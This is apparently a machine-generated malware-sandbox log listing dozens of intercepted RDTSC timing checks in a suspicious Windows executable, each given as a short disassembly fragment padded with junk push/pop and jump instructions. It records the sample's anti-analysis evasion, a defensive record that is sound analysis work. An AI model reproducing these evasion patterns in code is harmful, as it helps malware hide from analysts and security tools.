Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5910 second address: CB5932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF724E9654Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FF724E96546h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5932 second address: CB5936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5936 second address: CB593C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5DB9 second address: CB5DEA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007FF724EF3096h 0x00000009 pop ecx 0x0000000a jl 00007FF724EF30AFh 0x00000010 jmp 00007FF724EF30A9h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5DEA second address: CB5DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5DEE second address: CB5E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF724EF30A7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5E0D second address: CB5E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF724E96553h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5E26 second address: CB5E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB5E2E second address: CB5E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB9C85 second address: CB9C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB9C8C second address: CB9CA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF724E96552h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7EA6C second address: C7EA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7EA71 second address: C662CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF724E96548h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FF724E96548h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov ecx, ebx 0x00000029 xor edx, 06B0423Bh 0x0000002f call dword ptr [ebp+122D23CDh] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FF724E96552h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7EFA3 second address: C7EFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FBBB second address: C7FBC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FBC1 second address: C7FBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FBC5 second address: C7FBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FBC9 second address: C7FC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007FF724EF309Eh 0x00000011 mov eax, dword ptr [eax] 0x00000013 pushad 0x00000014 jmp 00007FF724EF30A9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FC03 second address: C7FC30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF724E96555h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FC30 second address: C7FC37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FD3D second address: C7FD4C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FD4C second address: C7FD50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FD50 second address: C7FD56 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FD56 second address: C7FD60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF724EF3096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C7FD60 second address: C7FDA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dx, di 0x0000000f lea eax, dword ptr [ebp+1248379Eh] 0x00000015 push edi 0x00000016 mov ecx, dword ptr [ebp+122D39BEh] 0x0000001c pop edi 0x0000001d pushad 0x0000001e jmp 00007FF724E9654Bh 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 jnc 00007FF724E96551h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CB9FAA second address: CB9FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC350D second address: CC3513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC3513 second address: CC3519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC3519 second address: CC3531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF724E9654Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC3531 second address: CC3535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC3535 second address: CC3539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC3539 second address: CC353F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC353F second address: CC354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC2053 second address: CC205D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC205D second address: CC2061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC2061 second address: CC2075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF724EF309Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3E025 second address: C3E044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Dh 0x00000007 jnp 00007FF724E96546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FF724E96546h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3E044 second address: C3E048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3E048 second address: C3E050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3E050 second address: C3E05A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF724EF3096h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C3E05A second address: C3E060 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CC980D second address: CC9813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CCCBE0 second address: CCCBEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CCC569 second address: CCC573 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF724EF3096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CCC573 second address: CCC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FF724E9654Ch 0x0000000c pop esi 0x0000000d push eax 0x0000000e jmp 00007FF724E96559h 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF724E96551h 0x0000001c ja 00007FF724E96559h 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 jmp 00007FF724E96551h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CCC784 second address: CCC78C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CCC8EC second address: CCC912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FF724E96556h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD195F second address: CD1968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD1968 second address: CD196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD196C second address: CD1978 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF724EF3096h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD1978 second address: CD1997 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF724E9654Ch 0x00000008 pushad 0x00000009 jmp 00007FF724E9654Ah 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD0DD7 second address: CD0DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 js 00007FF724EF3096h 0x0000000e jmp 00007FF724EF30A7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD0F87 second address: CD0FA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD0FA2 second address: CD0FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD0FA6 second address: CD0FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF724E96546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD1108 second address: CD1121 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF724EF30A1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD127B second address: CD1294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF724E96546h 0x0000000a jmp 00007FF724E9654Eh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD1294 second address: CD129C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD129C second address: CD12A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD12A0 second address: CD12AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD12AA second address: CD12B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD61B8 second address: CD61BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD61BE second address: CD61C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD61C4 second address: CD61C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD61C8 second address: CD61CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD61CE second address: CD61DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD6341 second address: CD634B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF724E96546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD634B second address: CD6380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF724EF30A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD6770 second address: CD678C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF724E96546h 0x00000008 jng 00007FF724E96546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 jnc 00007FF724E96546h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD678C second address: CD67AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF309Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF724EF309Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD67AE second address: CD67B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD67B2 second address: CD67B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD67B8 second address: CD67C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD691F second address: CD6926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD6926 second address: CD692C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD74F4 second address: CD74FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CD74FC second address: CD7500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB6C9 second address: CDB6DB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF724EF3096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF724EF3096h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB6DB second address: CDB6F0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF724E96546h 0x00000008 js 00007FF724E96546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push ebx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C2EF34 second address: C2EF3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: C2EF3F second address: C2EF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDAE4E second address: CDAE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDAE52 second address: CDAE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDAFA4 second address: CDAFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDAFA8 second address: CDAFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB0C7 second address: CDB0DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB0DB second address: CDB0EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FF724E96546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB0EB second address: CDB0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CDB0EF second address: CDB128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jo 00007FF724E96567h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FF724E96553h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE3C86 second address: CE3CB8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF724EF30B0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF724EF309Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE1E02 second address: CE1E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF724E96559h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE1E20 second address: CE1E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE1E28 second address: CE1E59 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007FF724E96546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF724E96550h 0x00000014 jno 00007FF724E96546h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e js 00007FF724E96552h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: CE1E59 second address: CE1E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF724EF3096h 0x0000000a jne 00007FF724EF30A2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
